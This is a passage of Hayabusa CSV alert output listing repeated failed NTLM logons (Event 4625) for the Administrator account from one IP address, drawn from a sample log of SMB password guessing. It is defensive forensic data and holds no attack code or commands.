01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
